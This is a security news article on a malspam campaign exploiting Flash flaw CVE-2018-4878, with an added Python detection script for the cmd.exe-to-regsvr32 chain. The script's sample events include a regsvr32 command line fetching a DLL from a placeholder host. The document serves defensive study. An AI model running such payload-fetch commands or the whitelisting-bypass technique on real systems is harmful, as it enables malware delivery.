Endpoint security firm Morphisec has spotted a large campaign that exploits a recently patched Adobe Flash Player flaw to deliver malware. The vulnerability, CVE-2018-4878, is a use-after-free bug that Adobe patched on February 6, following reports that North Korean attackers had been exploiting it in attacks aimed at South Korea.
The threat group, tracked as APT37, Reaper, Group123 and ScarCruft, has been expanding the scope and sophistication of its campaigns. After Adobe patched the security hole, which allows remote code execution, other malicious actors began looking for ways to exploit CVE-2018-4878.
Morphisec said it spotted a campaign last week, on February 22, that used a version of the exploit similar to the one created by APT37. However, researchers found that the exploit used in the malspam campaign, unlike the one employed in the original attacks, did not include a 64-bit version.
The attack starts with a spam email containing a link to a document hosted on safe-storage[.]biz. The document tells users that an online preview is not available and instructs them to enable editing mode in order to view the content once the file is downloaded and opened. If users comply, the Flash vulnerability is exploited and the Windows command prompt is launched. The cmd.exe process is then injected with malicious shellcode that connects to the attacker's domain.
The shellcode downloads and executes a DLL file using the Microsoft Register Server (regsvr32) utility. The legitimate tool is abused in an attempt to bypass application whitelisting products. At the time of Morphisec's analysis, the malicious documents and the Flash exploit were detected by only a few signature-based security solutions.
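The chain described above (lure document, command prompt launched by the exploit, regsvr32 pulling a DLL from a remote host) leaves process-creation telemetry that a defender can key on. The following is an added detection example, not code from Morphisec or from the article; the event field names (`Image`, `ParentImage`, `CommandLine`, `ProcessId`) mimic a Sysmon Event ID 1 record and are an assumption, and the sample events and the `c2.example.invalid` host are constructed for the demonstration.

```python
"""Flag process-creation events matching the cmd.exe -> regsvr32 chain.

Added detection example (not the article's or Morphisec's code).
Rules:
  office_spawned_cmd   - cmd.exe whose parent is an Office application
                         (the lure asks the victim to enable editing, then
                          the Flash exploit launches the command prompt)
  regsvr32_remote_url  - regsvr32.exe with an http(s):// URL on its command
                         line (signed Microsoft binary fetching a DLL, used
                          to sidestep application whitelisting)
  regsvr32_from_cmd    - regsvr32.exe launched directly by cmd.exe
Field names follow a Sysmon Event ID 1 layout; this is an assumption.
"""
import re
from typing import Dict, List, Tuple

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of all rules the event triggers (empty if benign)."""
    hits: List[str] = []
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    if image == "cmd.exe" and parent in OFFICE_PARENTS:
        hits.append("office_spawned_cmd")
    if image == "regsvr32.exe" and REMOTE_URL.search(cmdline):
        hits.append("regsvr32_remote_url")
    if image == "regsvr32.exe" and parent == "cmd.exe":
        hits.append("regsvr32_from_cmd")
    return hits


# Constructed sample telemetry: two benign events, then the two stages of
# the chain described in the article. The URL host is a placeholder.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"ProcessId": "4100",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'},
    {"ProcessId": "4212",
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe"},
    {"ProcessId": "4300",
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "cmd.exe"},
    {"ProcessId": "4316",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "regsvr32.exe /s http://c2.example.invalid/payload.dll"},
]


def scan(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Return (ProcessId, triggered rules) for every event that matched."""
    findings = []
    for event in events:
        hits = classify(event)
        if hits:
            findings.append((event["ProcessId"], hits))
    return findings


if __name__ == "__main__":
    for pid, rules in scan(SAMPLE_EVENTS):
        print(f"pid {pid}: {', '.join(rules)}")
```

The first two rules are the high-signal ones: an Office application spawning a command prompt, and regsvr32 given a remote URL, are rare in normal use. `regsvr32_from_cmd` on its own is noisier (installers and admin scripts register DLLs from batch files), so in practice it is best used to raise severity when it co-occurs with one of the other two, as it does for process 4316 in the sample.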
Since the URLs included in the spam emails were generated with Google's URL shortening service, researchers were able to determine that each of the several links used in this campaign had been clicked tens and even hundreds of times within three to four days of being created. Users clicked on the links from various browsers and email services, including Outlook, Gmail and Aruba.it.
“As expected and predicted, adversaries have quickly adopted the Flash exploit, which is easily reproducible,” Morphisec’s Michael Gorelik explained in a blog post. “With small variations to the attack, they successfully launched a massive malspam campaign and bypassed most of the existing static scanning solutions once again.”